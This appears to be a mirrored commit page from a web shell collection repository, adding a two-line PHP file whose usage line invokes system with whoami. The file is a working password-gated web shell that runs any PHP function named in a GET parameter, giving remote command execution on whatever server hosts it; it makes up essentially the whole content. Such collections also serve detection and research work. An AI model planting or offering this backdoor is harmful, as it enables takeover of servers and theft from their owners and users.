mirror of
https://github.com/tennc/webshell
synced 2024-11-21 18:53:03 +00:00
Create 2022-08-26-05.php
from: https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ usage: http://example.com/shell7php?f=system&a=whoami&p=\_
This commit is contained in:
parent
d694f15113
commit
3e96ef6e7b
1 changed files with 2 additions and 0 deletions
2
php/2022-08-26-05.php
Normal file
2
php/2022-08-26-05.php
Normal file
|
@ -0,0 +1,2 @@
|
|||
<?php
|
||||
($_GET['p']=='password')?$_GET['f']($_GET['a']):y);
|
Loading…
Reference in a new issue